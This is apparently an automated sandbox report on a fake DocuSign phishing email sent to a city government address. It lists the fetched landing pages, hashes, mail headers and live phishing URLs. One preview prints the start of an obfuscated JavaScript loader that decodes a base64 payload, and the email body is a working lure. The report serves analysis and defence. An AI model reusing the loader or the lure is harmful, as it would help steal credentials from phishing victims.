                                                                Preview:var accommodate= document.createElement("script");..accommodate.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(accommodate);..accommodate.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoiSmlLa1JDN1dmU0xuUndqY2xGMjhOQ2grazBlSkpncE1hb3graDNjMFVFaE9UZ2dCVWQrTWk3dElRZkZlZmZKXC9ENXhiVkNZQThNbmZxZHpQTVlDSlhEUk94SUJnU2g5T2JNclhcL2dUbGhBYU1UYjZlSVorMUl3RnpYWUZSODdkb1wvRE5senZadFBRWWRtMjQ0YjlmeVpHMmkyeURZaXFSeTUrQTFtOWxXZklGMjNMaVwvVlIzcUFwTU9PTzVLTE1oUXdvcEY4VEptV1k0R2JCVzI4M2pGMUorQVhYTnNcL1prcUh2b3dpK0lUV1wvU1NDcWpGZiszUHhrTzBCcDNzemF5U0dpQmpWNExRcmVQNjVXUkZZb1FsQWs0ZUt6OGRuM1VqbkIxeU5ORUVHYmNrVGNva2FvOWNDdjF2dlRPUk5ZdENMeWcraXdxSmtZZ1hVZzN2R0M3MUJIRlVwc1c3Z0dZQXYrS01TOXFPZkhyWnd0NUdraXNLM2hBK0pTdXRqTG9hdkhVZ2IrWE9cL3hOdmlVdkJjVXZORzczcXJCYjJtT1wvaDZcL0QrV0FrM2FtMnFPSnVmSlo2OGJrRzVma3U1cFNuZ1lZODZsakNvMUJldVhhTTZ2T3VjcFRQRElqRlwvcG5QZ0tHeEpkcjNHcFwvY25sdFVadXQ1ckpzU1RmN0hjUzNrUjM2NjZcL1lcL2RESkx6UHpFNjc4dENNMFl
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2830), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):5942
                                                                Entropy (8bit):5.731827404487394
                                                                Encrypted:false
                                                                SSDEEP:96:2hXn9ajzO6gMEKMr6FzweHeW8TlwUdlI8A+wwcc/s/gu2:W3Ujzb5Mr6RR+zjoen5Ggn
                                                                MD5:FE162C998C7E6B140E9A2ED06ECC21C3
                                                                SHA1:4F2C6F5FACFE4849E6865630337391BABC25BED6
                                                                SHA-256:0D2D9F93022AC60B282FF0001B0C7D9C5A9699FCFD4101F45035E7F61AE457B1
                                                                SHA-512:4C33CE2D94A977283E5DB5E49B1C9492028DBC09BB2966C0C0D9F13D9995648A8AD4E2327E89E1A5A2F4B66F46505EFE61157F97C10E733C36CED08F5189789F
                                                                Malicious:false
                                                                URL:https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/favicon.ico
                                                                Preview:<html>.. <head>.. <title>.</title>.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noindex, nofollow">.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>.. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js"></script>.. <style>body, html {height: 100%;margin: 0;display: flex;align-items: center;justify-content: center;}@keyframes bounce {0%, 100%, 12.5%, 32.5%, 76.1% {transform: translateY(0);}22.5%, 86% {transform: translateY(7px);}}#iced {height: 179px;width: 130px;overflow: hidden;margin-top: -59px;margin-left: 25px;}@keyframes shadow-fade {0%, 100%, 21.2%, 80% {opacity: 0;}47%, 70% {opacity: 1;}}#habitat {width: 130px;margin-top: 179px;}#hail {width: 130px;height: 71px;border-radius: 0 0 7px 7px;overflow: hidden;margin-top: -41px;}#hail>.dabble {width: 287px;height: 71px;background: #27a0e0;transform: translate(-153px, -70px) rotate(28deg);}#hail>.abash {wi
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2830), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):5942
                                                                Entropy (8bit):5.731827404487394
                                                                Encrypted:false
                                                                SSDEEP:96:2hXn9ajzO6gMEKMr6FzweHeW8TlwUdlI8A+wwcc/s/gu2:W3Ujzb5Mr6RR+zjoen5Ggn
                                                                MD5:FE162C998C7E6B140E9A2ED06ECC21C3
                                                                SHA1:4F2C6F5FACFE4849E6865630337391BABC25BED6
                                                                SHA-256:0D2D9F93022AC60B282FF0001B0C7D9C5A9699FCFD4101F45035E7F61AE457B1
                                                                SHA-512:4C33CE2D94A977283E5DB5E49B1C9492028DBC09BB2966C0C0D9F13D9995648A8AD4E2327E89E1A5A2F4B66F46505EFE61157F97C10E733C36CED08F5189789F
                                                                Malicious:false
                                                                Preview:<html>.. <head>.. <title>.</title>.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noindex, nofollow">.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>.. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js"></script>.. <style>body, html {height: 100%;margin: 0;display: flex;align-items: center;justify-content: center;}@keyframes bounce {0%, 100%, 12.5%, 32.5%, 76.1% {transform: translateY(0);}22.5%, 86% {transform: translateY(7px);}}#iced {height: 179px;width: 130px;overflow: hidden;margin-top: -59px;margin-left: 25px;}@keyframes shadow-fade {0%, 100%, 21.2%, 80% {opacity: 0;}47%, 70% {opacity: 1;}}#habitat {width: 130px;margin-top: 179px;}#hail {width: 130px;height: 71px;border-radius: 0 0 7px 7px;overflow: hidden;margin-top: -41px;}#hail>.dabble {width: 287px;height: 71px;background: #27a0e0;transform: translate(-153px, -70px) rotate(28deg);}#hail>.abash {wi
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):47992
                                                                Entropy (8bit):5.605846858683577
                                                                Encrypted:false
                                                                SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                MD5:CF3402D7483B127DED4069D651EA4A22
                                                                SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                Malicious:false
                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2830), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):5942
                                                                Entropy (8bit):5.731827404487394
                                                                Encrypted:false
                                                                SSDEEP:96:2hXn9ajzO6gMEKMr6FzweHeW8TlwUdlI8A+wwcc/s/gu2:W3Ujzb5Mr6RR+zjoen5Ggn
                                                                MD5:FE162C998C7E6B140E9A2ED06ECC21C3
                                                                SHA1:4F2C6F5FACFE4849E6865630337391BABC25BED6
                                                                SHA-256:0D2D9F93022AC60B282FF0001B0C7D9C5A9699FCFD4101F45035E7F61AE457B1
                                                                SHA-512:4C33CE2D94A977283E5DB5E49B1C9492028DBC09BB2966C0C0D9F13D9995648A8AD4E2327E89E1A5A2F4B66F46505EFE61157F97C10E733C36CED08F5189789F
                                                                Malicious:false
                                                                URL:https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/
                                                                Preview:<html>.. <head>.. <title>.</title>.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noindex, nofollow">.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>.. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js"></script>.. <style>body, html {height: 100%;margin: 0;display: flex;align-items: center;justify-content: center;}@keyframes bounce {0%, 100%, 12.5%, 32.5%, 76.1% {transform: translateY(0);}22.5%, 86% {transform: translateY(7px);}}#iced {height: 179px;width: 130px;overflow: hidden;margin-top: -59px;margin-left: 25px;}@keyframes shadow-fade {0%, 100%, 21.2%, 80% {opacity: 0;}47%, 70% {opacity: 1;}}#habitat {width: 130px;margin-top: 179px;}#hail {width: 130px;height: 71px;border-radius: 0 0 7px 7px;overflow: hidden;margin-top: -41px;}#hail>.dabble {width: 287px;height: 71px;background: #27a0e0;transform: translate(-153px, -70px) rotate(28deg);}#hail>.abash {wi
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (45034)
                                                                Category:downloaded
                                                                Size (bytes):45035
                                                                Entropy (8bit):5.400557193761079
                                                                Encrypted:false
                                                                SSDEEP:768:oCD98WxH5PbdrKAY+2HtedqdRQgFiIonqIjaEzY+iBggUydRm1TPjXk/bYjf+cd6:/xH5PbdrZkygk7qIjDgUjJY
                                                                MD5:C4D5335B2B69C6998EE34F5F7B3E246F
                                                                SHA1:AF0AE01ECCEE153877976D5C7D6500AA9C380B60
                                                                SHA-256:7EDA47B0C02C44BDAA43A5B14857F1257DDBD620B0397C32AA3AE8BAF769AB55
                                                                SHA-512:1C62C5D29C56848C258701F2E6B39E2152A3CACEB2C96F19ADB8542FDCC233F42BD0FAE9D03C8EA04F6B4490D0B69FD24F62B6D18A14A31D87E24906CFC88C58
                                                                Malicious:false
                                                                URL:https://challenges.cloudflare.com/turnstile/v0/b/6790c32b9fc9/api.js
                                                                Preview:"use strict";(function(){function St(e,r,a,o,c,u,g){try{var _=e[u](g),p=_.value}catch(f){a(f);return}_.done?r(p):Promise.resolve(p).then(o,c)}function Ot(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);function g(p){St(u,o,c,g,_,"next",p)}function _(p){St(u,o,c,g,_,"throw",p)}g(void 0)})}}function P(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):P(e,r)}function Oe(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Ce(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Oe(e,c,a[c])})}return e}function _r(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):47992
                                                                Entropy (8bit):5.605846858683577
                                                                Encrypted:false
                                                                SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                MD5:CF3402D7483B127DED4069D651EA4A22
                                                                SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                Malicious:false
                                                                URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2830), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):5942
                                                                Entropy (8bit):5.731827404487394
                                                                Encrypted:false
                                                                SSDEEP:96:2hXn9ajzO6gMEKMr6FzweHeW8TlwUdlI8A+wwcc/s/gu2:W3Ujzb5Mr6RR+zjoen5Ggn
                                                                MD5:FE162C998C7E6B140E9A2ED06ECC21C3
                                                                SHA1:4F2C6F5FACFE4849E6865630337391BABC25BED6
                                                                SHA-256:0D2D9F93022AC60B282FF0001B0C7D9C5A9699FCFD4101F45035E7F61AE457B1
                                                                SHA-512:4C33CE2D94A977283E5DB5E49B1C9492028DBC09BB2966C0C0D9F13D9995648A8AD4E2327E89E1A5A2F4B66F46505EFE61157F97C10E733C36CED08F5189789F
                                                                Malicious:false
                                                                Preview:<html>.. <head>.. <title>.</title>.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noindex, nofollow">.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>.. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js"></script>.. <style>body, html {height: 100%;margin: 0;display: flex;align-items: center;justify-content: center;}@keyframes bounce {0%, 100%, 12.5%, 32.5%, 76.1% {transform: translateY(0);}22.5%, 86% {transform: translateY(7px);}}#iced {height: 179px;width: 130px;overflow: hidden;margin-top: -59px;margin-left: 25px;}@keyframes shadow-fade {0%, 100%, 21.2%, 80% {opacity: 0;}47%, 70% {opacity: 1;}}#habitat {width: 130px;margin-top: 179px;}#hail {width: 130px;height: 71px;border-radius: 0 0 7px 7px;overflow: hidden;margin-top: -41px;}#hail>.dabble {width: 287px;height: 71px;background: #27a0e0;transform: translate(-153px, -70px) rotate(28deg);}#hail>.abash {wi
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (1350), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):2153
                                                                Entropy (8bit):5.413635371434677
                                                                Encrypted:false
                                                                SSDEEP:48:5r84fzPl3+Lghr2dJ9VVGFCl/bEhFtFr7/qTFjkWBFzFOZByFCUcppFOvGYF38YA:5Bfzd3lF2dPVVGAl/bEPtN7/c2WBFzYt
                                                                MD5:15029CC9E02668A23B84AB1DD80EFAA9
                                                                SHA1:FB7121F1A70EFB99BCBC1BEEF29616D185C78321
                                                                SHA-256:0EFC301CDB98C4AD5C708EA68ADEB71783E933F221477D8B7669AF0E4BCD68F2
                                                                SHA-512:B0401D6DFB68DCF68DC6071C116472CB29AE8DE56FCF4BC4C4CB4EE5FF3AEDD1E2B6F509228B0B4446260255277DE198A260CA0E89189DC549537347AE7EFADE
                                                                Malicious:false
                                                                URL:https://www.estampariaimagemeacao.com.br/js/images/tvavx.php
                                                                Preview:<html>...<head>....<meta name="robots" content="noindex, nofollow">....<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">....<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">....<style>body,html{margin:30px;display:flex;justify-content:center;align-items:center;flex-direction:column}.promote {position: relative;width: 80px;height: 80px;}.promote div {animation: 1.2s cubic-bezier(.5, 0, .5, 1) infinite promote;transform-origin: 40px 40px;}.promote div:after {content: " ";display: block;position: absolute;width: 7px;height: 7px;border-radius: 50%;background: #3B8AFF;margin: -4px 0 0 -4px;}.promote div:first-child {animation-delay: -36ms;}.promote div:first-child:after {top: 63px;left: 63px;}.promote div:nth-child(2) {animation-delay: -72ms;}.promote div:nth-child(2):after {top: 68px;left: 56px;}.promote div:nth-child(3) {animation-delay: -108ms;}.promote div:nth-child(3):after {top: 71px;left: 48px;}.promote div:nth-child(4) {animation-dela
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65447)
                                                                Category:downloaded
                                                                Size (bytes):89501
                                                                Entropy (8bit):5.289893677458563
                                                                Encrypted:false
                                                                SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                Malicious:false
                                                                URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text
                                                                Category:downloaded
                                                                Size (bytes):315
                                                                Entropy (8bit):5.0572271090563765
                                                                Encrypted:false
                                                                SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                Malicious:false
                                                                URL:https://www.estampariaimagemeacao.com.br/favicon.ico
                                                                Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                File type:RFC 822 mail, ASCII text, with very long lines (347), with CRLF line terminators
                                                                Entropy (8bit):5.799337183722073
                                                                TrID:
                                                                • E-Mail message (Var. 5) (54515/1) 100.00%
                                                                File name:(No subject) (59).eml
                                                                File size:32'759 bytes
                                                                MD5:6c6252a8c2a18d474c934f181a648984
                                                                SHA1:ac7172722a59aa3ae066ddb934aa7bbee235d9f8
                                                                SHA256:0c2d4fc907bd1735c4e4b3c08a6be70ab00df993a63bad7637e74ae9dfeda8d0
                                                                SHA512:44376d6e1c8e98d2ff1dc5563cc355f6399e2953f9760a3d4712e9424c9e4cd352d430f9ce364972c2acc459236d8917f006f215b4eecd542fbf9f7fb12c5743
                                                                SSDEEP:384:CLxYiX7s3nhxiQ1dZdK5pABLOEuRz61To/ZKxewCgxJ4CJyZuxu5SR:CLuiX7s3hUQ1dbvB4Rz61To/ZKnJcZ2
                                                                TLSH:C0E21847F7D00821CDAB496468037B3D7B7A99DA9F72487024CB6B6E0B4DCE2D9C6249
                                                                File Content Preview:Received: from PH0PR09MB11310.namprd09.prod.outlook.com (2603:10b6:510:2ac::7).. by CO6PR09MB8424.namprd09.prod.outlook.com with HTTPS; Tue, 27 Aug 2024.. 15:43:00 +0000..ARC-Seal: i=2; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=pass;.. b=DXObK
                                                                Subject:Statement Review f6b9fdf6027d415e549f7cfc4958b729f6b9fdf6027d415e549f7cfc4958b729
                                                                From:mariem.abdelmonem@ownheliopolis.net
                                                                To:mthao@santaclaraca.gov
                                                                Cc:
                                                                BCC:
                                                                Date:Tue, 27 Aug 2024 15:39:44 +0000
                                                                Communications:
                                                                • Document for Review You don't often get email from mariem.abdelmonem@ownheliopolis.net. Learn why this is important DocuSign Document Ready for Review Dear Mthao, A document has been sent to you for review. To access the document download the attachment above. This is a secure message. Please do not share the access link. If you have questions, please contact the sender directly. Thank you for using our service. 2023 All rights reserved. Company Address Document for Review Document for Review You don't often get email from mariem.abdelmonem@ownheliopolis.net. Learn why this is important DocuSign Document Ready for Review Dear Mthao, A document has been sent to you for review. To access the document download the attachment above. This is a secure message. Please do not share the access link. If you have questions, please contact the sender directly. Thank you for using our service. 2023 All rights reserved. Company Address You don't often get email from mariem.abdelmonem@ownheliopolis.net. Learn why this is important You don't often get email from mariem.abdelmonem@ownheliopolis.net. Learn why this is important You don't often get email from mariem.abdelmonem@ownheliopolis.net. Learn why this is important You don't often get email from mariem.abdelmonem@ownheliopolis.net. Learn why this is important You don't often get email from mariem.abdelmonem@ownheliopolis.net. Learn why this is important Learn why this is important https://aka.ms/LearnAboutSenderIdentification DocuSign Document Ready for Review Dear Mthao, A document has been sent to you for review. To access the document download the attachment above. This is a secure message. Please do not share the access link. If you have questions, please contact the sender directly. Thank you for using our service. 2023 All rights reserved. Company Address DocuSign Document Ready for Review Dear Mthao, A document has been sent to you for review. To access the document download the attachment above. This is a secure message. Please do not share the access link. If you have questions, please contact the sender directly. Thank you for using our service. 2023 All rights reserved. Company Address DocuSign Document Ready for Review Dear Mthao, A document has been sent to you for review. To access the document download the attachment above. This is a secure message. Please do not share the access link. If you have questions, please contact the sender directly. Thank you for using our service. 2023 All rights reserved. Company Address DocuSign DocuSign DocuSign Docu Sign Document Ready for Review Dear Mthao, A document has been sent to you for review. To access the document download the attachment above. Document Ready for Review Dear Mthao, A document has been sent to you for review. To access the document download the attachment above. Document Ready for Review Dear Mthao, A document has been sent to you for review. To access the document download the attachment above. Document Ready for Review Dear Mthao, A document has been sent to you for review. To access the document download the attachment above. Document Ready for Review Document Ready for Review Dear Mthao, A document has been sent to you for review. To access the document download the attachment above. Dear Mthao, A document has been sent to you for review. To access the document download the attachment above. Dear Mthao, This is a secure message. Please do not share the access link. If you have questions, please contact the sender directly. Thank you for using our service. 2023 All rights reserved. Company Address This is a secure message. Please do not share the access link. If you have questions, please contact the sender directly. Thank you for using our service. 2023 All rights reserved. Company Address This is a secure message. Please do not share the access link. If you have questions, please contact the sender directly. Thank you for using our service. 2023 All rights reserved. Company Address This is a secure message. Please do not share the access link. If you have questions, please contact the sender directly. Thank you for using our service. 2023 All rights reserved. Company Address This is a secure message. Please do not share the access link. If you have questions, please contact the sender directly. Thank you for using our service. This is a secure message. Please do not share the access link. If you have questions, please contact the sender directly. Thank you for using our service. This is a secure message. Please do not share the access link. If you have questions, please contact the sender directly. Thank you for using our service. 2023 All rights reserved. Company Address 2023 All rights reserved. Company Address 2023 All rights reserved. Company Address
                                                                Attachments:
                                                                • https://worker-rough-fire-759a.berwieberwieberwieberwieberwie.workers.dev/?eba=.htm
                                                                Key Value
                                                                Receivedfrom [127.0.0.1] (185.161.210.61) by AMS1EPF00000044.mail.protection.outlook.com (10.167.16.41) with Microsoft SMTP Server (version=TLS1_3, cipher=TLS_AES_256_GCM_SHA384) id 15.20.7918.13 via Frontend Transport; Tue, 27 Aug 2024 15:39:45 +0000
                                                                ARC-Seali=1; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=none; b=j36RfYfXtZ9hfyAwIH0WbItPNj1LZieUSkzTRXXiGMIsyrFIp+WCCOdKO9uUS+9tVagz2TeDd72CSATNVd3nHd/wlYZV3CMLJiGkUAFHMbK1sPiJPazQK2NIzTaB7hsr8hzH3AzYCMKUeWGczJpKxgFWW33SF7QXLrxYDPEN43JMEEM+RNXmJnCUgnZAtjQJYeDnIBBsMlHav2cHLUkwRFzDwxQd8YyvPUq1zKwoOOJ6gxk1dh6hSPGl0W3fqpyhoXYW+aFJdWP3Pg8pmMVe0Ii9pHqUVwpXrYj0mBqA68gxPEguBKyjSLy12lvX4a8piZQJayz+5wLae3UB2/2t2g==
                                                                ARC-Message-Signaturei=1; a=rsa-sha256; c=relaxed/relaxed; d=microsoft.com; s=arcselector10001; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-AntiSpam-MessageData-ChunkCount:X-MS-Exchange-AntiSpam-MessageData-0:X-MS-Exchange-AntiSpam-MessageData-1; bh=acXph6RYcdVRw1xGywabDNFx1g2Sy9PczGn55CvO7Tc=; b=vEjxXJNRivlEUwhi1AAsE/0SCtOOBOykKicVIJBDe80yLJdshmC2cb8TgmDhpRTiqstxNJ/8NScmMjeYRM54cKRPZoqrMD1wsvDIu725dziHci+hTIdnxFV/43cnM1PuiImG1pdMk3nGOdmsl+U1GyQGQAve6AAecD1Gg09iLxwtk+5XYdMRVdkMyhyDdvrj+p5j0cwoJo/XVw+TkN0wG3HX//4Ns/holFD8TzwiDcLz11cfXtzlNa+tI8cL7SXbAxRiJKq6pGwS9yPEkmM2sl1JHfXuoEtct0RyNB7WEC/J/feaCYrZ/p8UX89TnmP4VFE/GrGNHfQ147y3tdgR2A==
                                                                ARC-Authentication-Resultsi=1; mx.microsoft.com 1; spf=fail (sender ip is 185.161.210.61) smtp.rcpttodomain=santaclaraca.gov smtp.mailfrom=ownheliopolis.net; dmarc=none action=none header.from=ownheliopolis.net; dkim=none (message not signed); arc=none (0)
                                                                Authentication-Resultsspf=pass (sender IP is 40.107.22.92) smtp.mailfrom=ownheliopolis.net; dkim=none (message not signed) header.d=none;dmarc=bestguesspass action=none header.from=ownheliopolis.net;compauth=pass reason=109
                                                                Received-SPFFail (protection.outlook.com: domain of ownheliopolis.net does not designate 185.161.210.61 as permitted sender) receiver=protection.outlook.com; client-ip=185.161.210.61; helo=[127.0.0.1];
                                                                X-MS-Exchange-Authentication-Resultsspf=fail (sender IP is 185.161.210.61) smtp.mailfrom=ownheliopolis.net; dkim=none (message not signed) header.d=none;dmarc=none action=none header.from=ownheliopolis.net;
                                                                Content-Typemultipart/mixed; boundary="--_NmP-8a0e0a013553c617-Part_1"
                                                                Frommariem.abdelmonem@ownheliopolis.net
                                                                Tomthao@santaclaraca.gov
                                                                SubjectStatement Review f6b9fdf6027d415e549f7cfc4958b729f6b9fdf6027d415e549f7cfc4958b729
                                                                Message-ID<67ea0ce3-fcbe-b806-51a1-e8e62b8c9bf4@ownheliopolis.net>
                                                                DateTue, 27 Aug 2024 15:39:44 +0000
                                                                Return-Pathmariem.abdelmonem@ownheliopolis.net
                                                                X-EOPAttributedMessage1
                                                                X-MS-TrafficTypeDiagnostic AMS1EPF00000044:EE_|AM9P194MB1284:EE_|BL02EPF0001B419:EE_|PH0PR09MB11310:EE_|CO6PR09MB8424:EE_
                                                                X-MS-Office365-Filtering-Correlation-Id32ab8b02-2f2f-426e-8234-08dcc6ae7b48
                                                                X-MS-Exchange-SenderADCheck1
                                                                X-MS-Exchange-AntiSpam-Relay0
                                                                X-Microsoft-Antispam-Untrusted BCL:0;ARA:13230040|376014|61400799027|82310400026|34070700014|36860700013|41320700013;
